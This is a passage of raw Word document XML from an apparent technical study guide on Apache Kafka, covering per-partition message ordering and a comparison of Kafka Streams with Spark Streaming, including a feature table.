          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but it also means that maintaining strict global order becomes impossible across partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC08698"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ing Guarantees</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: For applications that require ordering across </w:t>
      </w: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a different approach may be necessary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F86FA7"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message keys</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure that related messages are routed to the same partition, preserving their order within that partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E02C04"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lement custom application-level logic to handle out-of-order messages across partitions (e.g., buffering, sequencing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530560D5"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8B929C">
          <v:rect id="_x0000_i3452" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10609AE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652278D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ider a Kafka topic with </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two partitions (P1 and P2)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The producer sends messages as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768388EE"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F28F9B7"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5200A0A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group reads from both partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1FB87F"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1 reads from Partition P1 (in order: Msg1 → Msg2 → Msg3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F5E92E"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2 reads from Partition P2 (in order: Msg4 → Msg5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FF6C18"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the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global order</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of messages cannot be guaranteed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E29B26" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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from P2)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from P1),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3566F71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44E66">
          <v:rect id="_x0000_i3453" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A230C7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3DA237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Within a partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka guarantees strict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based on the offsets assigned to the messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134675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 message order</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Different partitions may be consumed by different consumers, causing messages to be processed out of order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1124E2A0"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 preserve order across partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, related messages should be routed to the same partition using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4F16DC3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454" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDB3A46" w14:textId="50F07439"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61" w:name="_Toc197868075"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are Kafka Streams and how do they differ from Spark Streaming</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="861"/>
    </w:p>
    <w:p w14:paraId="6BE03583" w14:textId="092E962E" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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vs Spark Streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1371CC7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oth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are used for real-time stream processing, but they have different architectures, use cases, and design philosophies. Here's a detailed comparison between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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBDBE09"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35A72">
          <v:rect id="_x0000_i3455" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3019B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Overview of Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39574F0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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stream processing library</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> built on top of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It provides a simple, yet powerful way to process data streams within a Kafka ecosystem. Kafka Streams is lightweight and designed to be used </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>directly with Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657FBFB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ntegrates seamlessly with Kafka for both data ingestion and output. It is designed to run within the same Kafka cluster and operates at the level of individual Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EBD40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ghtweight &amp; Simple</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Kafka Streams supports both stateful and stateless operations (such as filtering, mapping, joining, and aggregating streams).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE6326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1AF90">
          <v:rect id="_x0000_i3456" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2328928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Overview of Spark Streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668926B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an extension of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Spark</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to process real-time data streams. Unlike Kafka Streams, Spark Streaming works in the context of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed clusters</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Spark’s processing engine and APIs. Spark Streaming works with batch-based processing and uses </w:t>
      </w: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to handle data in small, continuous batches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369F421A"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ilt on Spark</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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rehensive Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spark Streaming is designed to be used for more complex, large-scale analytics, and batch-to-stream integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E21D1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891395">
          <v:rect id="_x0000_i3457" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E82EA19"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724"/>
        <w:gridCol w:w="4273"/>
      </w:tblGrid>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="13BC9C5D" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F5BACC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6AFF42B3"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5DAEBE05"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tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="06EA3A9F" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45C7476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090ABC9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client-side stream processing library</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BF1D0F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rocessing, requires Spark cluster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="2B1DBE2E" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62D7A3B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 Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05B0F8BB"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w:t>
            </w:r>
            <w:r w:rsidRPr="0003272F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (real-time processing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7142CF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batch-based stream processing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="6DFC23B7" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F15BC2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6FE035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atively built for integration with Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="076CA4D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rocess Kafka data, but not native to Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="79A8DFD2" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CF3275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Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17399BE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mple API, easy to use for Java developers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181F08F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Spark infrastructure, more complex setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="1511E1CB" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E9F7C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2779A0B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stateful operations (e.g., aggregations)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0017332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ateful processing via Spark’s distributed system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="58B19080" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A0FE9E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7F8E5E5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tores state in Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13C71D0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ault-tolerant with Spark’s checkpointing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="2BF484CE" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F015B1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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62112E7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single instance (within Kafka)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4831722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distributed Spark cluster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="131343DA" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E978F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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77644D1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w latency (sub-second latency)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DEE1E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er latency due to micro-batching (1+ second)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="5E7B4C66" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="651EB16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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6588808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o batching (processing each event individually)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40B7992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icro-batching (processing data in small batches)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="4B07A7E6" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B2EE01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ment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10578F9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ploy as part of an application (JVM-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A2BBD3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a Spark cluster or managed service (e.g., Databricks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="25519E00" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FC0FB1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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="296EA29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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="145F411C"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 with micro-batching</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="0E83D3E8" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47271CC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lexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4287A94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asier to set up and manage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6976D2D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re complex due to Spark's infrastructure and setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="6EB962C5" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7265358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Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FC3A2D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Kafka's replication and consumer offset management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F4AAC1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Spark’s checkpointing and distributed recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="0C027A0E" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="590F0D2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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3179BA6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stream processing in applications using Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25F03A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distributed stream processing with advanced analytics and integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56112E3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C12719">
          <v:rect id="_x0000_i3458" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2710F4"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trengths and Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C24F1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p w14:paraId="0660CEF2"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lightweight real-time applications</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams is designed for scenarios where you want to process and transform real-time data with low latency and without the need for a heavy distributed cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEFC61F"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Since it’s built to work with Kafka, it’s ideal when your application already relies on Kafka for messaging and event-driven architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B90738B"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1FAD84FF"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data processing in microservices architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED3FAE2"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driven applications where each event is processed independently and in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054C9E8D"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that need to process streams from Kafka topics with low-latency and direct feedback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B30A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p w14:paraId="16368808"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complex, distributed analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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 for fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
